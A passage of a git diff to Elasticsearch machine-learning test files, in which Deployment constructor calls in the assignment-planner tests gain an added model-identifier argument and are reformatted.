AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); + Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(50).getBytes(), + 1, + 2, + Map.of(), + 3, + null, + 0, + 0 + ); AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -657,6 +716,7 @@ public void testCountPreviouslyAssignedThatAreStillAssigned() { 0 ); AssignmentPlan.Deployment deployment3 = new AssignmentPlan.Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, @@ -668,6 +728,7 @@ public void testCountPreviouslyAssignedThatAreStillAssigned() { 0 ); AssignmentPlan.Deployment deployment4 = new AssignmentPlan.Deployment( + "m_4", "m_4", ByteSizeValue.ofMb(20).getBytes(), 4, diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlannerTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlannerTests.java index 24095600c42d0..2a5b9839f80c3 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlannerTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlannerTests.java @@ -42,13 +42,25 @@ private static long scaleNodeSize(long nodeMemory) { public void testModelThatDoesNotFitInMemory() { { // Without perDeploymentMemory and perAllocationMemory specified List nodes = List.of(new Node("n_1", scaleNodeSize(50), 4)); - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(51).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(51).getBytes(), + 4, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(nodes, List.of(deployment)).computePlan(); assertThat(plan.assignments(deployment), isEmpty()); } { // With perDeploymentMemory and perAllocationMemory specified List nodes = List.of(new Node("n_1", scaleNodeSize(55), 4)); Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 4, @@ -66,7 +78,18 @@ public void testModelThatDoesNotFitInMemory() { public void testModelWithThreadsPerAllocationNotFittingOnAnyNode() { List nodes = List.of(new Node("n_1", scaleNodeSize(100), 4), new Node("n_2", scaleNodeSize(100), 5)); - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(1).getBytes(), 1, 6, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(1).getBytes(), + 1, + 6, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(nodes, List.of(deployment)).computePlan(); assertThat(plan.assignments(deployment), isEmpty()); } @@ -74,19 +97,31 @@ public void testModelWithThreadsPerAllocationNotFittingOnAnyNode() { public void testSingleModelThatFitsFullyOnSingleNode() { { Node node = new Node("n_1", scaleNodeSize(100), 4); - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(100).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(100).getBytes(), + 1, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(List.of(node), List.of(deployment)).computePlan(); assertModelFullyAssignedToNode(plan, deployment, node); } { Node node = new Node("n_1", scaleNodeSize(1000), 8); - Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(1000).getBytes(), 8, 1, Map.of(), 0, null, 0, 0); + Deployment deployment = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(1000).getBytes(), 8, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = new AssignmentPlanner(List.of(node), List.of(deployment)).computePlan(); assertModelFullyAssignedToNode(plan, deployment, node); } { Node node = new Node("n_1", scaleNodeSize(10000), 16); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(10000).getBytes(), 1, @@ -102,7 +137,18 @@ public void testSingleModelThatFitsFullyOnSingleNode() { } { Node node = new Node("n_1", scaleNodeSize(100), 4); - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(100).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(100).getBytes(), + 1, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(List.of(node), List.of(deployment)).computePlan(); assertModelFullyAssignedToNode(plan, deployment, node); } @@ -112,6 +158,7 @@ public void testSingleModelThatFitsFullyOnSingleNode_NewMemoryFields() { { Node node = new Node("n_1", ByteSizeValue.ofMb(500).getBytes(), 4); Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 1, @@ -128,6 +175,7 @@ public void testSingleModelThatFitsFullyOnSingleNode_NewMemoryFields() { { Node node = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 8); Deployment deployment = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 8, @@ -146,7 +194,18 @@ public void testSingleModelThatFitsFullyOnSingleNode_NewMemoryFields() { public void testSingleModelThatFitsFullyOnSingleNode_GivenTwoNodes_ShouldBeFullyAssignedOnOneNode() { Node node1 = new Node("n_1", scaleNodeSize(100), 4); Node node2 = new Node("n_2", scaleNodeSize(100), 4); - AssignmentPlan.Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(100).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment deployment = new Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(100).getBytes(), + 4, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(List.of(node1, node2), List.of(deployment)).computePlan(); @@ -162,6 +221,7 @@ public void testSingleModelThatFitsFullyOnSingleNode_GivenTwoNodes_ShouldBeFully Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); AssignmentPlan.Deployment deployment = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 4, @@ -184,7 +244,18 @@ public void testSingleModelThatFitsFullyOnSingleNode_GivenTwoNodes_ShouldBeFully } public void testModelWithMoreAllocationsThanAvailableCores_GivenSingleThreadPerAllocation() { - AssignmentPlan.Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 10, 1, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment deployment = new Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 10, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); // Single node { Node node = new Node("n_1", scaleNodeSize(100), 4); @@ -219,6 +290,7 @@ public void testModelWithMoreAllocationsThanAvailableCores_GivenSingleThreadPerA public void testModelWithMoreAllocationsThanAvailableCores_GivenSingleThreadPerAllocation_NewMemoryFields() { AssignmentPlan.Deployment deployment = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 10, @@ -266,10 +338,10 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution() { Node node2 = new Node("n_2", 2 * scaleNodeSize(50), 7); Node node3 = new Node("n_3", 2 * scaleNodeSize(50), 2); Node node4 = new Node("n_4", 2 * scaleNodeSize(50), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(50).getBytes(), 2, 3, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 0, null, 0, 0); - Deployment deployment4 = new Deployment("m_4", ByteSizeValue.ofMb(50).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 2, 3, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 0, null, 0, 0); + Deployment deployment4 = new Deployment("m_4", "m_4", ByteSizeValue.ofMb(50).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = new AssignmentPlanner( List.of(node1, node2, node3, node4), @@ -322,6 +394,7 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() Node node3 = new Node("n_3", ByteSizeValue.ofMb(900).getBytes(), 2); Node node4 = new Node("n_4", ByteSizeValue.ofMb(900).getBytes(), 2); Deployment deployment1 = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 2, @@ -333,6 +406,7 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() ByteSizeValue.ofMb(50).getBytes() ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 2, @@ -344,6 +418,7 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() ByteSizeValue.ofMb(50).getBytes() ); Deployment deployment3 = new Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(50).getBytes(), 1, @@ -355,6 +430,7 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() ByteSizeValue.ofMb(50).getBytes() ); Deployment deployment4 = new Deployment( + "m_4", "m_4", ByteSizeValue.ofMb(50).getBytes(), 2, @@ -412,7 +488,18 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() } public void testModelWithMoreAllocationsThanAvailableCores_GivenThreeThreadsPerAllocation() { - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 10, 3, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 10, + 3, + Map.of(), + 0, + null, + 0, + 0 + ); // Single node { Node node = new Node("n_1", scaleNodeSize(100), 4); @@ -447,6 +534,7 @@ public void testModelWithMoreAllocationsThanAvailableCores_GivenThreeThreadsPerA public void testModelWithMoreAllocationsThanAvailableCores_GivenThreeThreadsPerAllocation_NewMemoryFields() { Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 10, @@ -492,6 +580,7 @@ public void testModelWithMoreAllocationsThanAvailableCores_GivenThreeThreadsPerA public void testModelWithPreviousAssignmentAndNoMoreCoresAvailable() { Node node = new Node("n_1", scaleNodeSize(100), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 4, @@ -518,18 +607,18 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio new Node("n_6", ByteSizeValue.ofGb(32).getBytes(), 16) ); List deployments = List.of( - new Deployment("m_1", ByteSizeValue.ofGb(4).getBytes(), 10, 1, Map.of("n_1", 5), 0, null, 0, 0), - new AssignmentPlan.Deployment("m_2", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of("n_3", 2), 0, null, 0, 0), - new AssignmentPlan.Deployment("m_3", ByteSizeValue.ofGb(3).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_4", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of("n_3", 2), 0, null, 0, 0), - new Deployment("m_5", ByteSizeValue.ofGb(6).getBytes(), 2, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_6", ByteSizeValue.ofGb(1).getBytes(), 12, 1, Map.of(), 0, null, 0, 0), - new AssignmentPlan.Deployment("m_7", ByteSizeValue.ofGb(1).getBytes() / 2, 12, 1, Map.of("n_2", 6), 0, null, 0, 0), - new Deployment("m_8", ByteSizeValue.ofGb(2).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_9", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), - new AssignmentPlan.Deployment("m_10", ByteSizeValue.ofGb(7).getBytes(), 7, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_11", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_12", ByteSizeValue.ofGb(1).getBytes(), 10, 1, Map.of(), 0, null, 0, 0) + new Deployment("m_1", "m_1", ByteSizeValue.ofGb(4).getBytes(), 10, 1, Map.of("n_1", 5), 0, null, 0, 0), + new AssignmentPlan.Deployment("m_2", "m_2", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of("n_3", 2), 0, null, 0, 0), + new AssignmentPlan.Deployment("m_3", "m_4", ByteSizeValue.ofGb(3).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_4", "m_4", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of("n_3", 2), 0, null, 0, 0), + new Deployment("m_5", "m_5", ByteSizeValue.ofGb(6).getBytes(), 2, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_6", "m_6", ByteSizeValue.ofGb(1).getBytes(), 12, 1, Map.of(), 0, null, 0, 0), + new AssignmentPlan.Deployment("m_7", "m_7", ByteSizeValue.ofGb(1).getBytes() / 2, 12, 1, Map.of("n_2", 6), 0, null, 0, 0), + new Deployment("m_8", "m_8", ByteSizeValue.ofGb(2).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_9", "m_9", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), + new AssignmentPlan.Deployment("m_10", "m_10", ByteSizeValue.ofGb(7).getBytes(), 7, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_11", "m_11", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_12", "m_12", ByteSizeValue.ofGb(1).getBytes(), 10, 1, Map.of(), 0, null, 0, 0) ); AssignmentPlan assignmentPlan = new AssignmentPlanner(nodes, deployments).computePlan(); @@ -556,6 +645,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio // Use mix of old and new memory fields List deployments = List.of( new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 10, @@ -566,8 +656,9 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(400).getBytes(), ByteSizeValue.ofMb(100).getBytes() ), - new Deployment("m_2", ByteSizeValue.ofMb(100).getBytes(), 3, 1, Map.of("n_3", 2), 0, null, 0, 0), + new Deployment("m_2", "m_2", ByteSizeValue.ofMb(100).getBytes(), 3, 1, Map.of("n_3", 2), 0, null, 0, 0), new Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(50).getBytes(), 3, @@ -579,6 +670,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(50).getBytes() ), new Deployment( + "m_4", "m_4", ByteSizeValue.ofMb(50).getBytes(), 4, @@ -590,6 +682,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(100).getBytes() ), new Deployment( + "m_5", "m_5", ByteSizeValue.ofMb(500).getBytes(), 2, @@ -601,6 +694,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(100).getBytes() ), new Deployment( + "m_6", "m_6", ByteSizeValue.ofMb(50).getBytes(), 12, @@ -612,6 +706,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(20).getBytes() ), new Deployment( + "m_7", "m_7", ByteSizeValue.ofMb(50).getBytes(), 12, @@ -622,11 +717,11 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(300).getBytes(), ByteSizeValue.ofMb(50).getBytes() ), - new Deployment("m_8", ByteSizeValue.ofGb(2).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_9", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_10", ByteSizeValue.ofGb(7).getBytes(), 7, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_11", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_12", ByteSizeValue.ofGb(1).getBytes(), 10, 1, Map.of(), 0, null, 0, 0) + new Deployment("m_8", "m_8", ByteSizeValue.ofGb(2).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_9", "m_9", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_10", "m_10", ByteSizeValue.ofGb(7).getBytes(), 7, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_11", "m_11", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_12", "m_12", ByteSizeValue.ofGb(1).getBytes(), 10, 1, Map.of(), 0, null, 0, 0) ); AssignmentPlan assignmentPlan = new AssignmentPlanner(nodes, deployments).computePlan(); @@ -731,6 +826,7 @@ public void testPreviousAssignmentsGetAtLeastAsManyAllocationsAfterAddingNewMode previousModelsPlusNew.add( new AssignmentPlan.Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations(), m.threadsPerAllocation(), @@ -754,6 +850,7 @@ public void testGivenLargerModelWithPreviousAssignmentsAndSmallerModelWithoutAss Node node2 = new Node("n_2", scaleNodeSize(ByteSizeValue.ofGb(2).getMb()), 2); Node node3 = new Node("n_3", scaleNodeSize(ByteSizeValue.ofGb(2).getMb()), 2); Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(1200).getBytes(), 3, @@ -764,7 +861,7 @@ public void testGivenLargerModelWithPreviousAssignmentsAndSmallerModelWithoutAss 0, 0 ); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(1100).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(1100).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1, node2, node3), List.of(deployment1, deployment2)) .computePlan(); assertThat(assignmentPlan.getRemainingNodeMemory("n_1"), greaterThanOrEqualTo(0L)); @@ -790,6 +887,7 @@ public void testModelWithoutCurrentAllocationsGetsAssignedIfAllocatedPreviously( Node node1 = new Node("n_1", ByteSizeValue.ofGb(6).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofGb(6).getBytes(), 2); AssignmentPlan.Deployment deployment1 = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(1200).getBytes(), 3, @@ -801,6 +899,7 @@ public void testModelWithoutCurrentAllocationsGetsAssignedIfAllocatedPreviously( 0 ); AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(1100).getBytes(), 1, @@ -829,8 +928,30 @@ public void testModelWithoutCurrentAllocationsGetsAssignedIfAllocatedPreviously( public void testGivenPreviouslyAssignedDeployments_CannotAllBeAllocated() { Node node1 = new Node("n_1", scaleNodeSize(ByteSizeValue.ofGb(2).getMb()), 2); - AssignmentPlan.Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(1200).getBytes(), 1, 1, Map.of(), 1, null, 0, 0); - AssignmentPlan.Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(1100).getBytes(), 1, 1, Map.of(), 1, null, 0, 0); + AssignmentPlan.Deployment deployment1 = new Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(1200).getBytes(), + 1, + 1, + Map.of(), + 1, + null, + 0, + 0 + ); + AssignmentPlan.Deployment deployment2 = new Deployment( + "m_2", + "m_2", + ByteSizeValue.ofMb(1100).getBytes(), + 1, + 1, + Map.of(), + 1, + null, + 0, + 0 + ); AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1), List.of(deployment1, deployment2)).computePlan(); @@ -840,9 +961,20 @@ public void testGivenPreviouslyAssignedDeployments_CannotAllBeAllocated() { public void testGivenClusterResize_AllocationShouldNotExceedMemoryConstraints() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1840).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(2580).getBytes(), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new AssignmentPlan.Deployment("m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", + "m_2", + ByteSizeValue.ofMb(800).getBytes(), + 1, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); // First only start m_1 AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1, node2), List.of(deployment1)).computePlan(); @@ -882,9 +1014,9 @@ public void testGivenClusterResize_AllocationShouldNotExceedMemoryConstraints() public void testGivenClusterResize_ShouldAllocateEachModelAtLeastOnce() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(2600).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(2600).getBytes(), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); // First only start m_1 AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1, node2), List.of(deployment1)).computePlan(); @@ -953,9 +1085,9 @@ public void testGivenClusterResize_ShouldRemoveAllocatedDeployments() { // Ensure that plan is removing previously allocated models if not enough memory is available Node node1 = new Node("n_1", ByteSizeValue.ofMb(1840).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(2580).getBytes(), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(250).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(250).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); // Create a plan where all deployments are assigned at least once AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1, node2), List.of(deployment1, deployment2, deployment3)) @@ -981,6 +1113,7 @@ public void testGivenClusterResize_ShouldRemoveAllocatedDeployments_NewMemoryFie Node node1 = new Node("n_1", ByteSizeValue.ofMb(700).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 2); Deployment deployment1 = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 2, @@ -992,6 +1125,7 @@ public void testGivenClusterResize_ShouldRemoveAllocatedDeployments_NewMemoryFie ByteSizeValue.ofMb(100).getBytes() ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(100).getBytes(), 1, @@ -1003,6 +1137,7 @@ public void testGivenClusterResize_ShouldRemoveAllocatedDeployments_NewMemoryFie ByteSizeValue.ofMb(150).getBytes() ); Deployment deployment3 = new Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(50).getBytes(), 1, @@ -1048,6 +1183,7 @@ public static List createDeploymentsFromPlan(AssignmentPlan plan) { deployments.add( new Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations(), m.threadsPerAllocation(), @@ -1116,6 +1252,7 @@ public static Deployment randomModel(String idSuffix) { // randomly choose between old and new memory fields format if (randomBoolean()) { return new Deployment( + "m_" + idSuffix, "m_" + idSuffix, randomLongBetween(ByteSizeValue.ofMb(100).getBytes(), ByteSizeValue.ofGb(10).getBytes()), randomIntBetween(1, 32), @@ -1128,6 +1265,7 @@ public static Deployment randomModel(String idSuffix) { ); } else { return new Deployment( + "m_" + idSuffix, "m_" + idSuffix, randomLongBetween(ByteSizeValue.ofMb(100).getBytes(), ByteSizeValue.ofGb(1).getBytes()), randomIntBetween(1, 32), @@ -1165,7 +1303,7 @@ private void runTooManyNodesAndDeployments(int nodesSize, int modelsSize) { } List deployments = new ArrayList<>(); for (int i = 0; i < modelsSize; i++) { - deployments.add(new Deployment("m_" + i, ByteSizeValue.ofMb(200).getBytes(), 2, 1, Map.of(), 0, null, 0, 0)); + deployments.add(new Deployment("m_" + i, "m_" + i, ByteSizeValue.ofMb(200).getBytes(), 2, 1, Map.of(), 0, null, 0, 0)); } // Check plan is computed without OOM exception diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveAllAllocationsTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveAllAllocationsTests.java index 7499470cc8d6f..d22394ec86a77 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveAllAllocationsTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveAllAllocationsTests.java @@ -25,8 +25,8 @@ public class PreserveAllAllocationsTests extends ESTestCase { public void testGivenNoPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); PreserveAllAllocations preserveAllAllocations = new PreserveAllAllocations( List.of(node1, node2), List.of(deployment1, deployment2) @@ -39,6 +39,7 @@ public void testGivenPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(640).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofMb(640).getBytes(), 8); Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -50,6 +51,7 @@ public void testGivenPreviousAssignments() { 0 ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 6, @@ -122,6 +124,7 @@ public void testGivenPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 8); Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -133,6 +136,7 @@ public void testGivenPreviousAssignments() { ByteSizeValue.ofMb(10).getBytes() ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 6, @@ -208,7 +212,7 @@ public void testGivenPreviousAssignments() { public void testGivenModelWithPreviousAssignments_AndPlanToMergeHasNoAssignments() { Node node = new Node("n_1", ByteSizeValue.ofMb(400).getBytes(), 4); - Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 2, null, 0, 0); + Deployment deployment = new Deployment("m_1", 